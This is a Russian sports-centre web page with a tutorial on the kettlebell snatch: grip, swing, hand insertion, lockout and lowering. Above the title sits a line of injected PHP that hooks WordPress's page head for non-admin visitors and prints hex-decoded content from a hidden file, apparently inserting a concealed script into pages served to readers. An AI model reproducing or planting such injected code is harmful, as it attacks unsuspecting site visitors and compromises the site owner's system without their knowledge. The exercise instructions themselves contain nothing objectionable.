if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Рывок гири (2 часть) — МБУ "ЦФК и С"

Рывок гири (2 часть)

Рывок гири (2 часть)

Сегодня рассмотрим технику упражнения «Рывок гири». Это достаточно сложный материал, но мы считаем, что его необходимо изучить тем, кто желает подготовиться к выполнению норматива ВФСК «ГТО» наиболее эффективно и безопасно.
Упражнение «рывок гири» является одним из классических упражнений гиревого спорта. У спортсменов-гиревиков это упражнение считается технически сложным, так как требует не только физической силы, но и достаточного развития выносливости.
Упражнение начинается с отрыва гири от помоста и замаха за колени. Поставьте гирю перед собой на расстояние 25-30 см от пальцев ног. Возьмитесь за дужку хватом сверху. Сохраняйте спину ровной, а пресс — в напряжении. За счет неполного разгибания ног и корпуса, выполните замах гирей за колени.
После того как гиря начнет движение обратно из замаха, следует ее немного разогнать, подавая вперед таз и колени. После того как гиря пройдет колени и продолжит двигаться вперед, начинайте выпрямлять ноги, а корпус отводить немного назад, чтобы создать противовес снаряду.
Когда гиря будет примерно на уровне груди, нужно выполнить подрыв, резко выведя плечо вверх, можно при этом подняться на носок одноименной с рвущей рукой ноги. Руку после этого можно сгибать.
Примерно на уровне головы начинается самая сложная для начинающих спортсменов фаза рывка: просов кисти. Для правильного просова нужно перехватить гирю хватом снизу и резко просунуть руку так, чтобы внутренний угол дужки уперся в основание большого пальца. При этом дужка гири проходит по диагонали: от основания большого пальца к внешней стороне запястья.
После просова кисти рука полностью выпрямляется и спортсмен принимает положение фиксации. В этом положении судья засчитывает подъем. Тело спортсмена полностью выпрямлено, спортсмен обращен к судье корпусом (не скручивается). В этом положении спортсмен находится до объявления счета.
Для сброса гири нужно повернуть гирю вокруг предплечья, подать руку вперед, чуть согнув ее в локте, а корпус немного отклонить назад. На уровне головы необходимо перехватить дужку хватом сверху, чуть поднять плечо и встать на носки. И уже начиная с этого момента, снижать скорость полета снаряда. Дать гире долететь до положения замаха за колени и проделать упражнение заново.

Наверх